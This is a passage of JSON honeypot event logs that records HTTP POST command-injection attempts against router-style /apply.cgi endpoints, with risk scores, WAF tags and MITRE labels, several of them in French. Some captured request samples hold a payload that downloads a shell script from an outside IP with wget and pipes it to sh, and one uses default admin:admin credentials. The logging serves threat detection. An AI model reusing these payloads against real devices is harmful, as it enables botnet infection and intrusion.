100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 80, \u0022tag_count\u0022: 9, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022c186ca3e9dfdafa67dbbd33512e88419b126c737\u0022, \u0022event_fingerprint\u0022: \u0022776ffb2a7499e20a6aef854f832a2ad0b7b0ea31\u0022, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022confidence\u0022: 0.95, \u0022classification_confidence\u0022: 0.95, \u0022precision_score\u0022: 84, \u0022precision_signals\u0022: [\u0022pat-0842\u0022], \u0022kb_rule_ids\u0022: [\u0022pat-0842\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 80}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 95.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022dfe6d287e9ef40339d0c765a1b2ccef8\u0022, \u0022path_pattern_hash\u0022: \u0022b3e1dfd605a877958cebee595444f5d1\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 80}, \u0022payload_preview\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnectio\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnection: close\\r\\n\\r\\nwl_ssid=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lwizard%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnectio\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnection: close\\r\\n\\r\\nwl_ssid=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lwizard%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnectio\u0022, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022web_injection\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00229c9e9e56ccd5dba0c5a06f0283516c22cd852480\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnectio\u0022, \u0022attack_vector\u0022: \u0022http smuggling probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 Motif catalogue confirm\u00e9 \u00b7 5 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 80\/100 (\u00c9lev\u00e9) \u2014 MITRE TA0001 \u2014 confiance 95 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 95, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 80}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 80, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022pat-0842\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022pat-0842\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022http smuggling probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnectio\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 Motif catalogue confirm\u00e9 \u00b7 5 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 95 % \u2014 Score WAF 100 \u00b7 5 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":383},{"id":11809667,"ip":"45.153.34.252","ts":"2026-07-14 02:29:29.000000","proto":"tcp","src_port":47788,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":40,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/storage\/apply.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u0022add1b8e10b8941fd0e4f371c263f3015864c76c9\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 417, \u0022payload_entropy\u0022: 5.333208035071363, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 13, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022ededda045700a96c95dbbf21d705846bd9d423b4\u0022, \u0022event_fingerprint\u0022: \u00228253286b6538ce970853da654e3d0e94d18b2462\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022Cred Basic auth spray\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002281a4ae6f8e6ca129c8fa6dfc37087369\u0022, \u0022path_pattern_hash\u0022: \u002283b3b174f9cbd5824928567f1b35cdbf\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/storage\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 230\\r\\nConnection: close\\r\\n\\r\\nnext_page=\/tmp\/.s\u0026submit_button=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.1\u0022, \u0022payload_snippet\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/storage\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 230\\r\\nConnection: close\\r\\n\\r\\nnext_page=\/tmp\/.s\u0026submit_button=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.1\u0022, \u0022payload_snippet\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00222800a067d057183bdd28b8142c0f36c6a2876a05\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/storage\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/storage\/apply.cgi\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/storage\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/storage\/apply.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/storage\/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":417},{"id":11809665,"ip":"45.153.34.252","ts":"2026-07-14 02:29:28.000000","proto":"tcp","src_port":47764,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":34,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/apply.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u002231402cc48ac7ac052e1d50fc94349665a12c2c45\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 531, \u0022payload_entropy\u0022: 5.37112673408315, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 